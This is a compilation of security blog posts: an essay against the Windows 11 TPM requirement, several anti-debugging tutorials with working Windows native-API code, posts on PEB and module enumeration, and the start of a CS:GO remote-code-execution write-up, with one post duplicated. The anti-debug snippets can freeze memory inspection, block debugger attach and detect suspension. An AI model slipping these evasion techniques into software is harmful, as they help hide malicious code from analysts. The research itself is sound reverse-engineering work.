You see, the PC (emphasis on personal here) is in a way the last bastion of digital freedom you have, and that door is slowly closing. You need to only look at highly locked and controlled systems like consoles and phones to see the disparity.

Political affiliations aside, one can take the Wikileaks app removal from both the Apple store and Google play store as an excellent example of what the world looks like when your device controls you, instead of you controlling the device.

How does a TPM on my PC advance this agenda?

Twenty years ago, Microsoft set forth a goal of “trusted” computing called Palladium. While this technical goal has slowly but surely crept into Windows over the years, it has laid chiefly dormant because of critical missing infrastructure. This being that until recently, quite a large majority of consumer machines did not have a TPM, which you’ll learn later is a critical component to making Palladium work. And while we won’t deny that Bitlocker is excellent for if your device ever gets stolen, we will remind you that Microsoft always sold this tyranny to look great on the surface (no pun intended here).

When Palladium debuted, it was shot out of orbit by proponents of free and open software and back into hiding it went.

Comment about vendor withdrawal problem

So why is the TPM useful? The TPM (along with suitable firmware) is critical to measuring the state of your device - the boot state, in particular, to attest to a remote party that your machine is in a non-rooted state. It’s very similar to the Widevine L1 on Android devices; a third-party can then choose whether or not to serve you content. Everything will suddenly revolve around this “trust factor” of your PC. Imagine you want to watch your favorite show on Netflix in 4k, but your hardware trust factor is low? Too bad you’ll have to settle for the 720p stream. Untrusted devices could be watching in an instance of Linux KVM, and we can’t risk your pirating tools running in the background!

You might think that “It’s okay, though! I can emulate a TPM with KVM; the software already exists!” The unfortunate truth is that it’s not that simple. TPMs have unique keys burned in at manufacture time called Endorsement Keys, and these are unique per TPM. These keys are then cryptographically tied to the vendor who issued them, and as such, not only does a TPM uniquely identify your machine anywhere in the world, but content distributors can pick and choose what TPM vendors they want to trust. Sound familiar to you? It’s called Digital Rights Management, otherwise known as DRM.

Let’s not forget, Intel initially shipped the Pentium III with a built-in serial number unique per chip. Much the same initial fate as Palladium, it was also shot down by privacy groups, and the feature was subject to removal.

A common misunderstanding

There seems to be a lot misconceptions floating around in social media. In this section we’ll highlight one of them:

“I can patch the ISO or download one that removes the requirement.”

You can, sure. Windows and a majority of its components will function fine, similar to if you root your phone. Remember the part earlier, though, about 4k video content? That won’t be available to you (as an example). Whether it be a game or a movie, a vendor of consumable media decides what users they trust with their content. Unfortunately, without a TPM, you aren’t cutting it.

You’ve probably noticed that the marketing for this requirement is vague and confusing, and that’s intentional. It doesn’t do much for you, the consumer. However, it does set the stage for the future where Microsoft begins shipping their TPM on your processor. Enter Microsoft’s Pluton. The same technology is present in the Xbox. It would be an absolute dream come true for companies and vendors with special interests to completely own and control your PC to the same degree as a phone or the Xbox.

While the writers of this article will not deny that device attestation can bring excellent security for the standard consumers of the world, we cannot ignore that it opens the door to the restriction of user privacy and freedoms. It also paves the way to have the PC locked into a nice controllable cube for all the citizens to use.

You can see the wood for the trees here. When a company tells you that you need something, and it’s “for your own good,” and hey, they’re just on a humanitarian aid mission to save you from yourself, one should be highly skeptical. Microsoft is pushing this hard; we can even see them citing entirely dubious statistics. We took this one from The Verge:

“Microsoft has been warning for months that firmware attacks are on the rise. “Our Security Signals report found that 83 percent of businesses experienced a firmware attack, and only 29 percent are allocating resources to protect this critical layer,” says Weston.”

If you read into this link, you will find it cites information from Microsoft themselves, called “Security Signals,” and by the time you’re done reading it, you forgot how you got there in the first place. Not only is this statistic not factual, but successful firmware attacks are incredibly rare. Did we mention that a TPM isn’t going to protect you from UEFI malware that was planted on the device by a rogue agent at manufacture time? What about dynamic firmware attacks? Did you know that technologies such as Intel Boot Guard that have existed for the better part of a decade defend well against such attacks that might seek to overwrite flash memory?

Takeaway

We are here to remind you that the TPM requirement of Windows 11 furthers the agenda to protect the PC against you, its owner. It is one step closer to the lockdown of the PC. As Microsoft won the secure boot battle a decade ago, which is where Microsoft became the sole owner of the Secure Boot keys, this move also further tightens the screws on the liberties the PC gives us. While it won’t be evident immediately upon the launch of Windows 11, the pieces are moving together at a much faster pace.

We ask you to do your research in an age of increased restriction of personal freedom, censorship, and endless media propaganda. We strongly encourage you to research Microsoft’s future Pluton chip.

There are links provided below to research for yourself.

Preventing memory inspection on Windows

Justas Masiulis blog

24 May 2021 at 00:00

Have you ever wanted your dynamic analysis tool to take as long as GTA V to query memory regions while being impossible to kill and using 100% of the poor CPU core that encountered this? Well, me neither, but the technology is here and it’s quite simple!

What, Where, WTF?

As usual with my anti-debug related posts, everything starts with a little innocuous flag that Microsoft hasn’t documented. Or at least so I thought.

This time the main offender is NtMapViewOfSection, a syscall that can map a section object into the address space of a given process, mainly used for implementing shared memory and memory mapping files (The Win32 API for this would be MapViewOfFile).

1
2
3
4
5
6
7
8
9
10
11
NTSTATUS NtMapViewOfSection(
  HANDLE          SectionHandle,
  HANDLE          ProcessHandle,
  PVOID           *BaseAddress,
  ULONG_PTR       ZeroBits,
  SIZE_T          CommitSize,
  PLARGE_INTEGER  SectionOffset,
  PSIZE_T         ViewSize,
  SECTION_INHERIT InheritDisposition,
  ULONG           AllocationType,
  ULONG           Win32Protect);

By doing a little bit of digging around in ntoskrnl’s MiMapViewOfSection and searching in the Windows headers for known constants, we can recover the meaning behind most valid flag values.

1
2
3
4
5
6
7
8
/* Valid values for AllocationType */
MEM_RESERVE                0x00002000
SEC_PARTITION_OWNER_HANDLE 0x00040000
MEM_TOPDOWN                0x00100000
SEC_NO_CHANGE              0x00400000
SEC_FILE                   0x00800000
MEM_LARGE_PAGES            0x20000000
SEC_WRITECOMBINE           0x40000000

Initially I failed at ctrl+f and didn’t realize that 0x2000 is a known flag, so I started digging deeper. In the same function we can also discover what the flag does and its main limitations.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
// --- MAIN FUNCTIONALITY ---
if (SectionOffset + ViewSize > SectionObject->SizeOfSection &&
    !(AllocationAttributes & 0x2000))
    return STATUS_INVALID_VIEW_SIZE;

// --- LIMITATIONS ---
// Image sections are not allowed
if ((AllocationAttributes & 0x2000) &&
    SectionObject->u.Flags.Image)
    return STATUS_INVALID_PARAMETER;

// Section must have been created with one of these 2 protection values
if ((AllocationAttributes & 0x2000) &&
    !(SectionObject->InitialPageProtection & (PAGE_READWRITE | PAGE_EXECUTE_READWRITE)))
    return STATUS_SECTION_PROTECTION;

// Physical memory sections are not allowed
if ((Params->AllocationAttributes & 0x20002000) &&
    SectionObject->u.Flags.PhysicalMemory)
    return STATUS_INVALID_PARAMETER;

Now, this sounds like a bog standard MEM_RESERVE and it’s possible to VirtualAlloc(MEM_RESERVE) whatever you want as well, however APIs that interact with this memory do treat it differently.

How differently you may ask? Well, after incorrectly identifying the flag as undocumented, I went ahead and attempted to create the biggest section I possibly could. Everything went well until I opened the ProcessHacker memory view. The PC was nigh unusable for at least a minute and after that process hacker remained unresponsive for a while as well. Subsequent runs didn’t seem to seize up the whole system however it still took up to 4 minutes for the NtQueryVirtualMemory call to return.

I guess you could call this a happy little accident as Bob Ross would say.

The cause

Since I’m lazy, instead of diving in and reversing, I decided to use Windows Performance Recorder. It’s a nifty tool that uses ETW tracing to give you a lot of insight into what was happening on the system. The recorded trace can then be viewed in Windows Performance Analyzer.

Trace Viewed in Windows Performance Analyzer

This doesn’t say too much, but at least we know where to look.

After spending some more time staring at the code in everyone’s favourite decompiler it became a bit more clear what’s happening. I’d bet that it’s iterating through every single page table entry for the given memory range. And because we’re dealing with terabytes of of data at a time it’s over a billion iterations. (MiQueryAddressState is a large function, and I didn’t think a short pseudocode snippet would do it justice)

This is also reinforced by the fact that from my testing the relation between view size and time taken is completely linear. To further verify this idea we can also do some quick napkin math to see if it all adds up:

1
2
3
4
5
instructions per second (ips) = 3.8Ghz * ~8
page table entries      (n)   = 12TB / 4096
time taken              (t)   = 3.5 minutes

instruction per page table entry = ips * t / n = ~2000

In my opinion, this number looks rather believable so, with everything added up, I’ll roll with the current idea.

Minimal Example

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
// file handle must be a handle to a non empty file
void* section = nullptr;
auto  status  = NtCreateSection(&section,
                                MAXIMUM_ALLOWED,
                                nullptr,
                                nullptr,
                                PAGE_EXECUTE_READWRITE,
                                SEC_COMMIT,
                                file_handle);
if (!NT_SUCCESS(status))
    return status;

// Personally largest I could get the section was 12TB, but I'm sure people with more
// memory could get it larger.
void* base = nullptr;
for (size_t i = 46;  i > 38; --i) {
    SIZE_T view_size = (1ull << i);
    status           = NtMapViewOfSection(section,
                                          NtCurrentProcess(),
                                          &base,
                                          0,
                                          0x1000,
                                          nullptr,
                                          &view_size,
                                          ViewUnmap,
                                          0x2000, // <- the flag
                                          PAGE_EXECUTE_READWRITE);

    if (NT_SUCCESS(status))
        break;
}

Do note that, ideally, you’d need to surround code with these sections because only the reserved portions of these sections cause the slowdown. Furthermore, transactions could also be a solution for needing a non-empty file without touching anything already existing or creating something visible to the user.

Fin

I think this is a great and powerful technique to mess with people analyzing your code. The resource usage is reasonable, all it takes to set it up is a few syscalls, and it’s unlikely to get accidentally triggered.

Justas Masiulis blog
Process on a diet: anti-debug using job objects
21 January 2021 at 00:00

Process on a diet: anti-debug using job objects

Justas Masiulis blog

21 January 2021 at 00:00

In the second iteration of our anti-debug series for the new year, we will be taking a look at one of my favorite anti-debug techniques. In short, by setting a limit for process memory usage that is less or equal to current memory usage, we can prevent the creation of threads and modification of executable memory.

Job Object Basics

While job objects may seem like an obscure feature, the browser you are reading this article on is most likely using them (if you are a Windows user, of course). They have a ton of capabilities, including but not limited to:

Disabling access to user32 functionality.
Limiting resource usage like IO or network bandwidth and rate, memory commit and working set, and user-mode execution time.
Assigning a memory partition to all processes in the job.
Offering some isolation from the system by “upgrading” the job into a silo.

As far as API goes, it is pretty simple - creation does not really stand out from other object creation. The only other APIs you will really touch is NtAssignProcessToJobObject whose name is self-explanatory, and NtSetInformationJobObject through which you will set all the properties and capabilities.

1
2
3
4
5
6
7
8
NTSTATUS NtCreateJobObject(HANDLE*            JobHandle,
                           ACCESS_MASK        DesiredAccess,
                           OBJECT_ATTRIBUTES* ObjectAttributes);

NTSTATUS NtAssignProcessToJobObject(HANDLE JobHandle, HANDLE ProcessHandle);

NTSTATUS NtSetInformationJobObject(HANDLE JobHandle, JOBOBJECTINFOCLASS InfoClass,
                                   void*  Info,      ULONG              InfoLen);

The Method

With the introduction over, all one needs to create a job object, assign it to a process, and set the memory limit to something that will deny any attempt to allocate memory.

1
2
3
4
5
6
7
8
9
10
HANDLE job = nullptr;
NtCreateJobObject(&job, MAXIMUM_ALLOWED, nullptr);

NtAssignProcessToJobObject(job, NtCurrentProcess());

JOBOBJECT_EXTENDED_LIMIT_INFORMATION limits;
limits.ProcessMemoryLimit               = 0x1000;
limits.BasicLimitInformation.LimitFlags = JOB_OBJECT_LIMIT_PROCESS_MEMORY;
NtSetInformationJobObject(job, JobObjectExtendedLimitInformation,
                          &limits, sizeof(limits));

That is it. Now while it is sufficient to use only syscalls and write code where you can count the number of dynamic allocations on your fingers, you might need to look into some of the affected functions to make a more realistic program compatible with this technique, so there is more work to be done in that regard.

The implications

So what does it do to debuggers and alike?

Visual Studio - unable to attach.
WinDbg
- Waits 30 seconds before attaching.
- cannot set breakpoints.
x64dbg
- will not be able to attach (a few months old).
- will terminate the process of placing a breakpoint (a week or so old).
- will fail to place a breakpoint.

Please do note that the breakpoint protection only works for pages that are not considered private. So if you compile a small test program whose total size is less than a page and have entry breakpoints or count it into the private commit before reaching anti-debug code - it will have no effect.

Conclusion

Although this method requires you to be careful with your code, I personally love it due to its simplicity and power. If you cannot see yourself using this, do not worry! You can expect the upcoming article to contain something that does not require any changes to your code.

Justas Masiulis blog
New year, new anti-debug: Don’t Thread On Me
4 January 2021 at 00:00

New year, new anti-debug: Don’t Thread On Me

Justas Masiulis blog

4 January 2021 at 00:00

With 2020 over, I’ll be releasing a bunch of new anti-debug methods that you most likely have never seen. To start off, we’ll take a look at two new methods, both relating to thread suspension. They aren’t the most revolutionary or useful, but I’m keeping the best for last.

Bypassing process freeze

This one is a cute little thread creation flag that Microsoft added into 19H1. Ever wondered why there is a hole in thread creation flags? Well, the hole has been filled with a flag that I’ll call THREAD_CREATE_FLAGS_BYPASS_PROCESS_FREEZE (I have no idea what it’s actually called) whose value is, naturally, 0x40.

To demonstrate what it does, I’ll show how PsSuspendProcess works:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
NTSTATUS PsSuspendProcess(_EPROCESS* Process)
{
  const auto currentThread = KeGetCurrentThread();
  KeEnterCriticalRegionThread(currentThread);

  NTSTATUS status = STATUS_SUCCESS;
  if ( ExAcquireRundownProtection(&Process->RundownProtect) )
  {
    auto targetThread = PsGetNextProcessThread(Process, nullptr);
    while ( targetThread )
    {
      // Our flag in action
      if ( !targetThread->Tcb.MiscFlags.BypassProcessFreeze )
        PsSuspendThread(targetThread, nullptr);

      targetThread = PsGetNextProcessThread(Process, targetThread);
    }
    ExReleaseRundownProtection(&Process->RundownProtect);
  }
  else
    status = STATUS_PROCESS_IS_TERMINATING;

  if ( Process->Flags3.EnableThreadSuspendResumeLogging )
    EtwTiLogSuspendResumeProcess(status, Process, Process, 0);

  KeLeaveCriticalRegionThread(currentThread);
  return status;
}

So as you can see, NtSuspendProcess that calls PsSuspendProcess will simply ignore the thread with this flag. Another bonus is that the thread also doesn’t get suspended by NtDebugActiveProcess! As far as I know, there is no way to query or disable the flag once a thread has been created with it, so you can’t do much against it.

As far as its usefulness goes, I’d say this is just a nice little extra against dumping and causes confusion when you click suspend in Processhacker, and the process continues to chug on as if nothing happened.

Example

For example, here is a somewhat funny code that will keep printing I am running. I am sure that seeing this while reversing would cause a lot of confusion about why the hell one would suspend his own process.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
#define THREAD_CREATE_FLAGS_BYPASS_PROCESS_FREEZE 0x40

NTSTATUS printer(void*) {
    while(true) {
        std::puts("I am running\n");
        Sleep(1000);
    }
    return STATUS_SUCCESS;
}

HANDLE handle;
NtCreateThreadEx(&handle, MAXIMUM_ALLOWED, nullptr, NtCurrentProcess(),
                 &printer, nullptr, THREAD_CREATE_FLAGS_BYPASS_PROCESS_FREEZE,
                 0, 0, 0, nullptr);

NtSuspendProcess(NtCurrentProcess());

Suspend me more

Continuing the trend of NtSuspendProcess being badly behaved, we’ll again abuse how it works to detect whether our process was suspended.

The trick lies in the fact that suspend count is a signed 8-bit value. Just like for the previous one, here’s some code to give you an understanding of the inner workings:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
ULONG KeSuspendThread(_ETHREAD *Thread)
{
  auto irql = KeRaiseIrql(DISPATCH_LEVEL);
  KiAcquireKobjectLockSafe(&Thread->Tcb.SuspendEvent);

  auto oldSuspendCount = Thread->Tcb.SuspendCount;
  if ( oldSuspendCount == MAXIMUM_SUSPEND_COUNT ) // 127
  {
    _InterlockedAnd(&Thread->Tcb.SuspendEvent.Header.Lock, 0xFFFFFF7F);
    KeLowerIrql(irql);
    ExRaiseStatus(STATUS_SUSPEND_COUNT_EXCEEDED);
  }

  auto prcb = KeGetCurrentPrcb();
  if ( KiSuspendThread(Thread, prcb) )
    ++Thread->Tcb.SuspendCount;

  _InterlockedAnd(&Thread->Tcb.SuspendEvent.Header.Lock, 0xFFFFFF7F);
  KiExitDispatcher(prcb, 0, 1, 0, irql);
  return oldSuspendCount;
}

If you take a look at the first code sample with PsSuspendProcess it has no error checking and doesn’t care if you can’t suspend a thread anymore. So what happens when you call NtResumeProcess? It decrements the suspend count! All we need to do is max it out, and when someone decides to suspend and resume us, they’ll actually leave the count in a state it wasn’t previously in.

Example

The simple code below is rather effective:

Visual Studio - prevents it from pausing the process once attached.
WinDbg - gets detected on attach.
x64dbg - pause button becomes sketchy with error messages like “Program is not running” until you manually switch to the main thread.
ScyllaHide - older versions used NtSuspendProcess and caused it to be detected, but it was fixed once I reported it.

1
2
3
4
5
6
7
8
for(size_t i = 0; i < 128; ++i)
  NtSuspendThread(thread, nullptr);

while(true) {
  if(NtSuspendThread(thread, nullptr) != STATUS_SUSPEND_COUNT_EXCEEDED)
    std::puts("I was suspended\n");
  Sleep(1000);
}

Conclusion

If anything, I hope that this demonstrated that it’s best not to rely on NtSuspendProcess to work as well as you’d expect for tools dealing with potentially malicious or protected code. Hope you liked this post and expect more content to come out in the upcoming weeks.

Enumerating process modules

Justas Masiulis blog

29 April 2018 at 00:00

On my quest of writing a library to wrap common winapi functionality using native apis I came across the need to enumerate process modules. One may think that there is a simple undocumented function to achieve such functionality, however that is not the case.

Existing options

First of all lets see what are the existing APIs that are provided by microsoft because surely they’d know their own code and the operating systems limitations best.

Process Status API has a rather understandable and simple interface to get an array of module handles and then acquire the information of module using other functions. If you have written windows specific code before you might feel rather comfortable but for a new developer dealing with extensive error handling due to the fact that you may need to reallocate memory might not be very fun.

Structures and usage.

1
2
3
BOOL  EnumProcessModules(HANDLE process, HMODULE* modules, DWORD byteSize, DWORD* reqByteSize);
BOOL  GetModuleInformation(HANDLE process, HMODULE module, MODULEINFO* info, DWORD infoSize);
DWORD GetModuleFileNameEx(HANDLE process, HMODULE module, TCHAR* filename, DWORD filenameMaxSize);

Next up Tool Help is at the same time simpler and more complex than PSAPI. It does not require the user to allocate memory by himself and returns fully processed structures but requires quite a few extra steps. Toolhelp also leaves some opportunities for the user to shoot himself in the foot such as returning INVALID_HANDLE_VALUE instead of nullptr on failure and requires to clean up the resources by closing the handle.

Structures and usage.

1
2
3
HANDLE CreateToolhelp32Snapshot(DWORD flags, DWORD processId);
BOOL   Module32First(HANDLE snapshot, MODULEENTRY32* entry);
BOOL   Module32Next(HANDLE snapshot, MODULEENTRY32* entry);

Performance

An important aspect of these functions is how fast they are. Below are some rough benchmarks of these apis to get full module information including its full path on a machine running Windows 10 with an i7-8550u processor compared to implementation written by ourselves.

TLHELP	PSAPI	native
220ms	2200 ms	50ms

Turns out that while EnumProcessModules is really fast by itself it only saves the dll base address instead of something like LDR_DATA_TABLE_ENTRY address where all of the information is saved. Due to this every single time you want to for example get the module name it repeats all the work iterating modules list once again.

The implementation

So what exactly do we need to do to get the modules of another process?

In essence the answer is rather simple:

Get its Process Environment Block (PEB) address.
Walk the LDR table whose address we acquired from PEB.

The first problem is that a process may have 2 PEBs - one 32bit and one 64bit. The most intuitive behaviour would be to get the modules of the same architecture as the target process. However NtQueryInformationProcess with the ProcessBasicInformation flag gives us access only to the PEB of the same architecture as ours. This problem was solved in the previous post so it will not be discussed further again.

The next problem is that PEB is not the only thing that depends on architecture. All structures and functions we plan to use will also need to be apropriatelly selected. To overcome this hurdle we will create 2 structures containing the correct functions and the type to use for representing pointers. We want to use different memory reading functions because if we are a 32 bit process NtReadVirtualMemory will also expect a 32 bit address which might not be sufficient when the target process is 64bit.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
template<class TargetPointer>
struct native_subsystem {
  using target_pointer = TargetPointer;

  template<class T>
  NTSTATUS static read(void* handle, uintptr_t address,
                       T&    buffer, size_t    size = sizeof(T)) noexcept
  {
    return NtReadVirtualMemory(
      handle, reinterpret_cast<void*>(address), &buffer, size, nullptr);
  }
};

struct wow64_subsystem {
  using target_pointer = uint64_t;

  template<class T>
  NTSTATUS static read(void* handle, uint64_t address,
                       T&    buffer, uint64_t size = sizeof(T)) noexcept
  {
    return NtWow64ReadVirtualMemory64(handle, address, &buffer, size, nullptr);
  }
};

For convenience sake and to keep our code DRY we will also need to write some sort of helper function which picks one of the aforementioned structures to use. For that we will use some templates. If this doesn’t fit you, macros or just functions pointers are an option, both of which have a set of their own pros and cons.

1
2
3
4
5
6
7
8
9
10
11
template<class Fn, class... As>
NTSTATUS subsystem_call(bool same_arch, Fn fn, As&&... args)
{
  if(same_arch)
    return fn.template operator()<native_subsystem<uintptr_t>>(forward<As>(args)...);
#ifdef _WIN64
  return fn.template operator()<native_subsystem<uint32_t>>(forward<As>(args)...);
#else
  return fn.template operator()<wow64_subsystem>(forward<As>(args)...);
#endif
}

While I agree this function looks rather ugly, operator() is really the most sane option because you don’t have to worry about naming things. Its usage is rather simple too. All you have to do is pass it whether the architecture is the same and a structure whose operator() is overloaded and accepts the subsystem type. We can take a look at exactly how the usage looks like by finally taking use of the functions we wrote earlier and completing the first step of getting the correct PEB pointer.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
template<class Callback>
NTSTATUS enum_modules(void* handle, Callback cb) noexcept
{
  PROCESS_EXTENDED_BASIC_INFORMATION info;
  info.Size = sizeof(info);
  ret_on_err(NtQueryInformationProcess(
    handle, ProcessBasicInformation, &info, sizeof(info), nullptr));

  const bool same_arch = is_process_same_arch(info);

  std::uint64_t peb_address;
  if(same_arch)
    peb_address = reinterpret_cast<std::uintptr_t>(info.BasicInfo.PebBaseAddress);
  else
    ret_on_err(remote_peb_address(handle, false, peb_address)));

  return subsystem_call(same_arch, enum_modules_t{}, handle, std::move(cb), peb_address);
}

Now all that is left is to implement the actual modules enumeration about which I won’t be talking as much because it is rather straightforward and information about it is easily found on the internet. For it to work you’ll also need architecture agnostic versions of windows structures that you can be easily made by templating their member types and some find+replace.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
struct enum_modules_t {
  template<class Subsystem, class Callback>
  NTSTATUS operator()(void* handle, Callback cb, std::uint64_t peb_address) const
  {
    using ptr_t = typename Subsystem::target_pointer;

    // we read the Ldr member of peb
    ptr_t Ldr;
    ret_on_err(Subsystem::read(handle,
                               static_cast<ptr_t>(peb_address) +
                                offsetof(peb_t<ptr_t>, Ldr),
                               Ldr));

    const auto list_head =
      Ldr + offsetof(peb_ldr_data_t<ptr_t>, InLoadOrderModuleList);

    // read InLoadOrderModulesList.Flink
    ptr_t load_order_modules_list_flink;
    ret_on_err(Subsystem::read(handle, list_head, load_order_modules_list_flink));

    ldr_data_table_entry_t<ptr_t> entry;

    // iterate over the modules list
    for(auto list_curr = load_order_modules_list_flink; list_curr != list_head;) {
      // read the entry
      ret_on_err(Subsystem::read(handle, list_curr, entry));

      // update the pointer to entry
      list_curr = entry.InLoadOrderLinks.Flink;

      // call the callback with the info.
      // to get the path we would need another read.
      cb(info);
  }

    return STATUS_SUCCESS;
  }
};

Justas Masiulis blog
Acquiring process environment block (PEB)
20 April 2018 at 00:00

Acquiring process environment block (PEB)

Justas Masiulis blog

20 April 2018 at 00:00

While attempting to enumerate modules of a remote process I came across the need to acquire the process environment block or PEB in short. While it may seem quite simple - that is a single native API call and you are done the problem is that there actually are 2 evironment blocks.

The problem at hand

As it turns out, the most documented method NtQueryInformationProcess(ProcessBasicInformation) can only acquire the address of PEB whose architecture is same as of your own process. As you can guess if the architectures do not match, the address you get is quite useless when trying to enumerate loaded modules. To solve the problem one has to use a bunch of different combinations of flags and APIs to get the correct structure.

Implementation

To cut the chase here is a table of exactly what needs to be used to correctly acquire the PEB according to architecture of your own and target process.

Target	Local	Function
same	same	`NtQueryInformationProcess(ProcessBasicInformation)`
32 bit	64 bit	`NtQueryInformationProcess(ProcessWow64Information)`
64 bit	32 bit	`NtWow64QueryInformationProcess64(ProcessBasicInformation)`

First step is to figure out whether our process is of the same architecture. Coincidentally that can be done by reusing the return value of same native API that actually returns the address of PEB.

1
2
3
4
5
6
7
8
9
10
11
// acquire the PROCESS_EXTENDED_BASIC_INFORMATION of target process
PROCESS_EXTENDED_BASIC_INFORMATION info;
info.Size = sizeof(info);
NtQueryInformationProcess(
  handle, ProcessBasicInformation, &info, sizeof(info), nullptr);

// function to check whether the arch is the same
bool is_process_same_arch(const PROCESS_EXTENDED_BASIC_INFORMATION& info) noexcept
{
  return info.IsWow64Process == !!NtCurrentTeb()->WowTebOffset;
}

And in the case where the architecture doesn’t match we can then choose to use one of the other two aforementioned APIs.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
NTSTATUS remote_peb_diff_arch(void* handle, uint64_t& peb_addr) noexcept
{
#ifdef _WIN64 // we are x64 and target is x32
  return NtQueryInformationProcess(
    handle, ProcessWow64Information, &peb_addr, sizeof(peb_addr), nullptr);
#else // we are x32 and the target is x64
  PROCESS_BASIC_INFORMATION64 pbi;
  const auto status = NtWow64QueryInformationProcess64(
    handle, ProcessBasicInformation, &pbi, sizeof(pbi), nullptr);

  if(NT_SUCCESS(status))
    peb_addr = pbi.PebBaseAddress;
  return status;
#endif
}

Lastly here is the full, finished code listing.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
bool is_process_same_arch(const PROCESS_EXTENDED_BASIC_INFORMATION& info) noexcept
{
  return info.IsWow64Process == !!NtCurrentTeb()->WowTebOffset;
}

NTSTATUS peb_address(void* handle, std::uint64_t& address) noexcept
  PROCESS_EXTENDED_BASIC_INFORMATION info;
  info.Size = sizeof(info);
  auto status = NtQueryInformationProcess(
    handle, ProcessBasicInformation, &info, sizeof(info), nullptr);

  if(NT_SUCCESS(status)){
    if(is_process_same_arch(info))
      peb_address = reinterpret_cast<std::uintptr_t>(info.BasicInfo.PebBaseAddress);
    else
      status = remote_peb_address(handle, false, peb_address));
  }

  return status;
}

The next article will explain how to enumerate the loaded modules list.

secret club
Preventing memory inspection on Windowsjm
23 May 2021 at 23:00

Preventing memory inspection on Windows

secret club

By: jm

23 May 2021 at 23:00

What, Where, WTF?

As usual with my anti-debug related posts, everything starts with a little innocuous flag that Microsoft hasn’t documented. Or at least so I thought.

NTSTATUS NtMapViewOfSection(
  HANDLE          SectionHandle,
  HANDLE          ProcessHandle,
  PVOID           *BaseAddress,
  ULONG_PTR       ZeroBits,
  SIZE_T          CommitSize,
  PLARGE_INTEGER  SectionOffset,
  PSIZE_T         ViewSize,
  SECTION_INHERIT InheritDisposition,
  ULONG           AllocationType,
  ULONG           Win32Protect);

By doing a little bit of digging around in ntoskrnl’s MiMapViewOfSection and searching in the Windows headers for known constants, we can recover the meaning behind most valid flag values.

/* Valid values for AllocationType */
MEM_RESERVE                0x00002000
SEC_PARTITION_OWNER_HANDLE 0x00040000
MEM_TOPDOWN                0x00100000
SEC_NO_CHANGE              0x00400000
SEC_FILE                   0x00800000
MEM_LARGE_PAGES            0x20000000
SEC_WRITECOMBINE           0x40000000

Initially I failed at ctrl+f and didn’t realize that 0x2000 is a known flag, so I started digging deeper. In the same function we can also discover what the flag does and its main limitations.

// --- MAIN FUNCTIONALITY ---
if (SectionOffset + ViewSize > SectionObject->SizeOfSection &&
    !(AllocationAttributes & 0x2000))
    return STATUS_INVALID_VIEW_SIZE;

// --- LIMITATIONS ---
// Image sections are not allowed
if ((AllocationAttributes & 0x2000) &&
    SectionObject->u.Flags.Image)
    return STATUS_INVALID_PARAMETER;

// Section must have been created with one of these 2 protection values
if ((AllocationAttributes & 0x2000) &&
    !(SectionObject->InitialPageProtection & (PAGE_READWRITE | PAGE_EXECUTE_READWRITE)))
    return STATUS_SECTION_PROTECTION;

// Physical memory sections are not allowed
if ((Params->AllocationAttributes & 0x20002000) &&
    SectionObject->u.Flags.PhysicalMemory)
    return STATUS_INVALID_PARAMETER;

Now, this sounds like a bog standard MEM_RESERVE and it’s possible to VirtualAlloc(MEM_RESERVE) whatever you want as well, however APIs that interact with this memory do treat it differently.

I guess you could call this a happy little accident as Bob Ross would say.

The cause

Trace Viewed in Windows Performance Analyzer

This doesn’t say too much, but at least we know where to look.

instructions per second (ips) = 3.8Ghz * ~8
page table entries      (n)   = 12TB / 4096
time taken              (t)   = 3.5 minutes

instruction per page table entry = ips * t / n = ~2000

In my opinion, this number looks rather believable so, with everything added up, I’ll roll with the current idea.

Minimal Example

// file handle must be a handle to a non empty file
void* section = nullptr;
auto  status  = NtCreateSection(&section,
                                MAXIMUM_ALLOWED,
                                nullptr,
                                nullptr,
                                PAGE_EXECUTE_READWRITE,
                                SEC_COMMIT,
                                file_handle);
if (!NT_SUCCESS(status))
    return status;

// Personally largest I could get the section was 12TB, but I'm sure people with more
// memory could get it larger.
void* base = nullptr;
for (size_t i = 46;  i > 38; --i) {
    SIZE_T view_size = (1ull << i);
    status           = NtMapViewOfSection(section,
                                          NtCurrentProcess(),
                                          &base,
                                          0,
                                          0x1000,
                                          nullptr,
                                          &view_size,
                                          ViewUnmap,
                                          0x2000, // <- the flag
                                          PAGE_EXECUTE_READWRITE);

    if (NT_SUCCESS(status))
        break;
}

Conclusion

Back Engineering
Posts
18 May 2021 at 04:26

Posts

Back Engineering

18 May 2021 at 04:26

Back Engineering
About
1 January 2001 at 00:00

About

Back Engineering

1 January 2001 at 00:00

secret club
Counter-Strike Global Offsets: reliable remote code executionbrymko， dezk， Simon Scannell
13 May 2021 at 23:00

Counter-Strike Global Offsets: reliable remote code execution

secret club

By: brymko， dezk， Simon Scannell

13 May 2021 at 23:00

One of the factors contributing to Counter-Strike Global Offensive’s (herein “CS:GO”) massive popularity is the ability for anyone to host their own community server. These community servers are free to download and install and allow for a high grade of customization. Server administrators can create and utilize custom assets such as maps, allowing for innovative game modes.

However, this design choice opens up a large attack surface. Players can connect to potentially malicious servers, exchanging complex game messages and binary assets such as textures.

We’ve managed to find and exploit two bugs that, when combined, lead to reliable remote code execution on a player’s machine when connecting to our malicious server. The first bug is an information leak that enabled us to break ASLR in the client’s game process. The second bug is an out-of-bounds access of a global array in the .data section of one of the game’s loaded modules, leading to control over the instruction pointer.

Community server list

Players can join community servers using a user friendly server browser built into the game:

Once the player joins a server, their game client and the community server start talking to each other. As security researchers, it was our task to understand the network protocol used by CS:GO and what kind of messages are sent so that we could look for vulnerabilities.

As it turned out, CS:GO uses its own UDP-based protocol to serialize, compress, fragment, and encrypt data sent between clients and a server. We won’t go into detail about the networking code, as it is irrelevant to the bugs we will present.

